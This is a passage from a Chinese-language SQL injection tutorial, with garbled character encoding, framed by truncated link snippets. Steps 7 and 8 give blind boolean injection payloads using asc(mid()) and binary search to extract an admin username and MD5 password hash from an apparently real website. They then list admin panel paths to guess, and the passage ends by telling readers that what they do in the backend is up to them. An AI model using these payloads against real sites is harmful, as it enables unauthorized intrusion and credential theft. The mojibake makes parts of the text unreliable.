推薦：解讀ADO訪(fǎng)問(wèn)不同數(shù)據(jù)庫(kù)的差別
Microsoft公司提供了統(tǒng)一的數(shù)據(jù)訪(fǎng)問(wèn)接口A(yíng)ctiveX Data Object，簡(jiǎn)稱(chēng)ADO。但實(shí)際應(yīng)用編程中，訪(fǎng)問(wèn)不同的數(shù)據(jù)庫(kù)，如Access、SQL Server或VFP，會(huì)存在一些“細(xì)微”差別，常常有這樣的情況，用ADO對(duì)象訪(fǎng)問(wèn)某一數(shù)據(jù)庫(kù)的程序都調(diào)試通過(guò)了，但用同樣的程序訪(fǎng)問(wèn)其他數(shù)

　　7．猜解賬號(hào)密碼字符

　　在這里的猜解要用到asc(mid())這個(gè)函數(shù)。前面基礎(chǔ)篇我們已經(jīng)講過(guò)這些函數(shù)了，我這里稍提一下。asc()是把字符轉(zhuǎn)換為其對(duì)應(yīng)的ASC碼，mid()則是定位字符串里的字符。

　　格式：mid(字符串，開(kāi)始位置，子串長(zhǎng)度)

　　比如說(shuō)mid(name,1,1)即取name字符串里第一個(gè)字符。如果這里的name等于xysky 則mid(name,1,1)=x而mid(name,1,2)則取y

　　這兩個(gè)函數(shù)結(jié)合asc(mid())則是先定位字符串里的字符再取其ASC碼，比如asc(mid(username,2,1))則是判斷username字符串里的第二位的ASC碼，在SQL注入里常用它，有漢字也不用怕,不過(guò)遇上了漢字確實(shí)有點(diǎn)郁悶,中文字符的asc值小于0的。在后面加上如下的語(yǔ)句：

　　and 11=(select userid from users where asc(mid(username,1,1))<0) 返回正常，說(shuō)明賬號(hào)果然是漢字，下面的事就不那么容易了。下面我們用到二分法的思想開(kāi)始猜解第一位字符：

　　and 11=(select userid from users where asc(mid(username,1,1))<-19000) 返回正常

　　and 11=(select userid from users where asc(mid(username,1,1))>-20000) 返回正常

　　以上說(shuō)明賬號(hào)的第一個(gè)字符的ASCII碼在-19000和-20000之間，再用二分法猜解下去，最后的第一個(gè)為:-19765

　　and 11=(select userid from users where asc(mid(username,1,1))= -19765)

　　ASCII碼為-19765對(duì)應(yīng)的字符就是：菜

　　下面接著猜第二個(gè)字符，最后語(yǔ)法為：and 11=(select userid from users where asc(mid(username,2,1))=-15119)。

　　對(duì)應(yīng)字符為：鳥(niǎo)

　　到這里我想其它不用猜了，因?yàn)檫@個(gè)網(wǎng)站上的信息已經(jīng)告訴我們了：

　　作者：菜鳥(niǎo)老師 票數(shù)：0等級(jí):點(diǎn)擊：308 呵呵，如果沒(méi)錯(cuò)的話(huà)就是它了。

　　接著猜密碼，依然二分法：

　　and 11=(select userid from users where asc(mid(userpwd,1,1))<50)

　　and 11=(select userid from users where asc(mid(userpwd,1,1))>40)

　　最后得到的為：48 對(duì)應(yīng)的字符就是0

　　依此下去，最后得到加密后的MD5值為：00d60a849c6c381e ，由于MD5目前沒(méi)有好的破解方法，只能暴力破解，我們就此打此。

　　8．后臺(tái)的猜解

　　經(jīng)過(guò)前面辛苦的猜解，我們已經(jīng)得到這個(gè)網(wǎng)站的賬號(hào)密碼了，當(dāng)然這里已經(jīng)是MD5加密了，我們只是說(shuō)一下常規(guī)的SQL注入攻擊中的一步，往往也是最為關(guān)鍵的一步：尋找網(wǎng)站管理后臺(tái)。像這樣動(dòng)態(tài)生成頁(yè)面的網(wǎng)站，一般都會(huì)有個(gè)管理后臺(tái)的，添加文章編輯文章修改文章刪除文章什么的，而一般的程序員在命名后臺(tái)的時(shí)候往往是：admin_index.asp admin_login.asp admin.asp admin/admin_index.asp admin/admin_login.asp，當(dāng)然還有退出后臺(tái)的文件：logout.asp admin_logout.asp admin/admin_logout.asp等。一個(gè)一個(gè)的訪(fǎng)問(wèn)，結(jié)果嘛，我只能說(shuō)靠運(yùn)氣加上你的經(jīng)驗(yàn)了。以這個(gè)站為例，前面那些登錄的我一個(gè)也沒(méi)猜到，因?yàn)槲也碌接衋dmin這個(gè)目錄，我就一直以為登錄的頁(yè)面也在admin目錄，猜了好久，最后無(wú)意訪(fǎng)問(wèn)admin/logout.asp，頁(yè)面居然自動(dòng)轉(zhuǎn)到后臺(tái)登錄頁(yè)面了，居然是上一級(jí)目錄的login.asp，我狂汗。

　　有了后臺(tái)，有了賬號(hào)密碼（當(dāng)然這個(gè)站是MD5加密的密碼，我也懶得破解），你就可以進(jìn)后臺(tái)了，至于進(jìn)后臺(tái)你能做什么，就看后臺(tái)的功能與你的技術(shù)了，你想做什么，就依靠你自己了，本文只演示SQL注入漏洞最基本的注入，想深入研究的朋友一定要好好掌握哦！

分享：如何防止Access 2000密碼被破
如果你過(guò)分信任 Access 2000數(shù)據(jù)庫(kù)的密碼保護(hù)，你可能會(huì)因此而蒙受損失。這是因?yàn)锳ccess 2000的數(shù)據(jù)庫(kù)級(jí)密碼并不安全，相反它很脆弱，甚至下面這段非常小的程序就可以攻破它： �� 程序一（VB6）：Access 2000密碼破譯 Private Sub Command1_Click() Const Off